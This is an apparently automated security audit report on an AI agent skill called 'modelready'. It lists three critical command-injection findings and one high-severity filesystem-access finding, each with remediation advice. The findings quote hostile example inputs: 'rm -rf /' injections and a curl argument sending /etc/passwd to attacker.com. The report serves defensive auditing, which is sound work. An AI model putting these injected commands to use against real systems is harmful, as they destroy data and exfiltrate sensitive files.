Trust Assessment
modelready received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 3 critical, 1 high, 0 medium, and 0 low severity. Key findings include Command Injection via 'repo' parameter, Command Injection via 'text' parameter, Command Injection via 'ip' parameter.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Command Injection via 'repo' parameter The skill allows users to specify a 'repo' parameter, which can be a local path or a Hugging Face repository. The manifest indicates the skill requires 'bash' and 'curl' binaries. If the 'repo' input is directly interpolated into a shell command executed by 'bash' or 'curl' without proper sanitization, an attacker can inject arbitrary shell commands. For example, a malicious 'repo' value like '; rm -rf /;' could lead to severe system compromise. Implement strict input validation and sanitization for the 'repo' parameter. Ensure it only contains valid repository names or file paths. When executing shell commands, use parameterized execution or proper escaping mechanisms (e.g., `shlex.quote` in Python) to prevent command injection. Consider using a allow-list for acceptable repository formats or paths. | LLM | SKILL.md:25 | |
| CRITICAL | Command Injection via 'text' parameter The skill allows users to provide a 'text' message for chat. The manifest indicates the skill requires 'bash' and 'curl' binaries. If this 'text' input is directly interpolated into a shell command (e.g., a 'curl' command sending data to the local model endpoint) without proper sanitization, an attacker can inject arbitrary shell commands. For instance, a 'text' value like 'hello --data-binary @/etc/passwd http://attacker.com' could exfiltrate sensitive files. Implement strict input validation and sanitization for the 'text' parameter. When executing shell commands, use parameterized execution or proper escaping mechanisms (e.g., `shlex.quote` in Python) to prevent command injection. If the 'text' is intended for an API call, ensure it's properly encoded (e.g., URL-encoded, JSON-encoded) and not directly passed to a shell command that could interpret it as code. | LLM | SKILL.md:38 | |
| CRITICAL | Command Injection via 'ip' parameter The skill allows users to set an 'ip' address for the host. The manifest indicates the skill requires 'bash' and 'curl' binaries. If this 'ip' input is directly interpolated into a shell command executed by 'bash' or 'curl' without proper sanitization, an attacker can inject arbitrary shell commands. For example, an 'ip' value like '127.0.0.1; rm -rf /' could lead to severe system compromise. Implement strict input validation for the 'ip' parameter to ensure it is a valid IP address or hostname. When executing shell commands, use parameterized execution or proper escaping mechanisms (e.g., `shlex.quote` in Python) to prevent command injection. | LLM | SKILL.md:50 | |
| HIGH | Excessive Permissions: Arbitrary Local File System Access The skill allows specifying a local path for the 'repo' parameter (e.g., 'repo=/home/user/models/Qwen-2.5'). This grants the skill access to potentially any file or directory on the local filesystem where the agent is running. Combined with the confirmed use of 'bash' and 'curl' (from the manifest), this capability could be exploited by a malicious 'repo' path to read, write, or execute arbitrary files, leading to data exfiltration or further system compromise. If local file system access is strictly necessary, implement robust path sanitization and confinement (e.g., chroot, containerization, or strict allow-listing of directories). Ensure that the skill only accesses paths explicitly intended and validated. Avoid allowing arbitrary paths from user input. | LLM | SKILL.md:25 |
Scan History
Embed Code
[](https://skillshield.io/report/3b86ec57852fcb9f)
Powered by SkillShield